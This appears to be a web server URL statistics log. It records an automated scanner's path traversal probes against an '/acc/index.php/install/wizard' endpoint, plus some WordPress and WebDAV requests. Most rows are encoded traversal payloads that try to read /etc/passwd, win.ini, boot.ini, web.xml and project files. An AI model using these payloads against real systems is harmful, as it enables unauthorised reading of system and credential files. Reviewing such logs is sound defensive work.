/acc/index.php/install/wizard/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd 2 33198 0 0
/acc/index.php/install/wizard/config/1'\"1000 1 5262 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\windows/win.ini 1 5283 0 0
/acc/index.php/install/wizard/config/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\boot.ini 1 5278 0 0
/acc/index.php/install/wizard/config/../WEB-INF/web.xml 1 5282 0 0
/acc/index.php/install/..../..../..../..../..../..../..../..../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 5289 0 0
/acc/index.php/install/wizard/config/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 1 5315 0 0
/acc/index.php/install/wizard/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 5281 0 0
/acc/index.php/install/wizard/config/0s6wgrsclhsg.jsp 1 5262 0 0
/acc/index.php/install/wizard/locale/.../.../.../.../.../.../.../.../etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/../../package.json 1 56116 0 0
/acc/index.php/install/wizard/config/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd 1 5355 0 0
/acc/index.php/install/wizard/..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini 2 33198 0 0
/acc/index.php/install/wizard/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini 1 16599 0 0
/acc/index.php/install/wizard/config/../../Gemfile 1 5268 0 0
/acc/index.php/install/wizard/config/../../../../Gemfile 1 5268 0 0
/webdav/ 78 0 0 0
/acc/index.php/install/wizard/config/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini 1 5311 0 0
/wp-admin/admin-ajax.php 1 12358 1 1
/acc/index.php/install/wizard/locale/../../web.config 1 56116 0 0
//site/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install 1 16599 0 0
/acc/index.php/install/wizard/locale/../Gemfile 1 56116 0 0
/acc/index.php/install/wizard/.../.../.../.../.../.../.../.../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/../WEB-INF/web.xml%C0%80.jsp 1 16599 0 0
/acc/index.php/install/wizard/config/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd 1 5307 0 0
/acc/index.php/install/wizard/config/%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%afetc%c0%af%c0%af%c0%afpasswd 1 5411 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/windows/win.ini 1 16599 0 0
END_SIDER